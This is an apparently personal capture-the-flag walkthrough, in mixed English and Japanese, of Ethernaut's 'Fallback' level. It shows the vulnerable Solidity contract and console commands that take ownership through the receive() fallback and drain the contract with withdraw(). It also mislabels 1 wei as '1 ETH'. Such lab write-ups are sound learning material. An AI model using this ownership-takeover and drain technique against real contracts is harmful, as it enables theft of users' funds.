Ethernaut-solution 1.Fallback
Ethernaut-solution
1.Fallback
- you claim ownership of the contract
- you reduce its balance to 0
learning
- How to send Ether when intracting with an ABI
- How to send Ether outside of the ABI
- Converting to and from wei/Ether units
- Fallback methods
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import '@openzeppelin/contracts/utils/math/SafeMath.sol';
contract Fallback {
using SafeMath for uint256;
mapping(address => uint) public contributions;//internal database how much Ether each address has and how many token each address has, how much money each address has
address payable public owner;
//constructor deployed it set as owner
constructor() public {//executed lifecycle of smartcontract first get deploy
owner = msg.sender; //send as owner
contributions[msg.sender] = 1000 * (1 ether); //mapping contribution set amount of Ether
}
//modifier can applied any function in a smart contract
modifier onlyOwner {
require(
msg.sender == owner,
"caller is not the owner"
);
_;
}
//contributionsの構成にsecurityhallがある
//何回もfunction contribute()を起動して、senderがownerよりcontributionsがmany many timesの状況になればownerになれてしまう
function contribute() public payable {
require(msg.value < 0.001 ether);
contributions[msg.sender] += msg.value;
if(contributions[msg.sender] > contributions[owner]) {
owner = msg.sender;
}
}
function getContribution() public view returns (uint) {
return contributions[msg.sender];
}
function withdraw() public onlyOwner {
owner.transfer(address(this).balance);
}
// this function is fallback function /you wanna send money to A contract
receive() external payable {
require(msg.value > 0 && contributions[msg.sender] > 0);//the best way attack become the owner
//contributions条件を満たすことが攻撃の最初の準備。satisfy second condition first.
owner = msg.sender;
}
}
solution
-
- you claim ownership of the contract
contract...reference of our smart contract
n {methods: {…}, abi: Array(7), address: '0xc3309271b114BFdC7DaDCAd2C3ED67116A798624', transactionHash: undefined, constructor: ƒ, …}
contract.address...smartcontract address
'0xc3309271b114BFdC7DaDCAd2C3ED67116A798624'
player...my address
'0xF6eA8E869C68362eC2FA1b2159Fe459D6D8f30F5'
await contract.contributions(player)
o {negative: 0, words: Array(2), length: 1, red: null}
Array 0: 0 。現状no valueなのがわかる
await contract.getContribution()
0のまんま
そこでcall contribute function! It's payable.value: 1 => 1 ETH
1ETH send
contract.contribute({value: 1})
Promise {<pending>, _events: o, emit: ƒ, on: ƒ, …}
1ETH sendでaccount valueが増えているか確認 key:value
await contract.contributions(player)
o {negative: 0, words: Array(2), length: 1, red: null}
Array 0: 1 。
ownerの確認
await contract.owner()
//this smartcontract own address
'0x9CB391dbcD447E645D6Cb55dE6ca23164130D008'
playerの確認 = まだownerになってない
'0xF6eA8E869C68362eC2FA1b2159Fe459D6D8f30F5'
//sendTransaction is special function from web3.js
contract.sendTransaction({value: 1})
Promise {<pending>, _events: o, emit: ƒ, on: ƒ, …}
//transaction
⛏️ Sent transaction ⛏ https://rinkeby.etherscan.io/tx/0x3062639ee20c48140d527b324f283dfbca7b07bc2f42d1f01e907d3055b76177
⛏️ Mined transaction ⛏ https://rinkeby.etherscan.io/tx/0x3062639ee20c48140d527b324f283dfbca7b07bc2f42d1f01e907d3055b76177
Transactionの成功によりcontractのownerが自分にchangeされているのを確認
await contract.owner()
'0xF6eA8E869C68362eC2FA1b2159Fe459D6D8f30F5'
-
- you reduce its balance to 0
//balanceの確認
await getBalance(contract.address)
'0.000000000000000002'
function withdrawをreturn transfer all balance our wallet!
contract.withdraw()
Promise {<pending>, _events: o, emit: ƒ, on: ƒ, …}
⛏️ Sent transaction ⛏ https://rinkeby.etherscan.io/tx/0x4654244d4f2d9ece5c6cf290227532dda4960939ef760914f4e47cb9c7524c68
⛏️ Mined transaction ⛏ https://rinkeby.etherscan.io/tx/0x4654244d4f2d9ece5c6cf290227532dda4960939ef760914f4e47cb9c7524c68
balanceが"0"になっているのを確認
await getBalance(contract.address)
'0'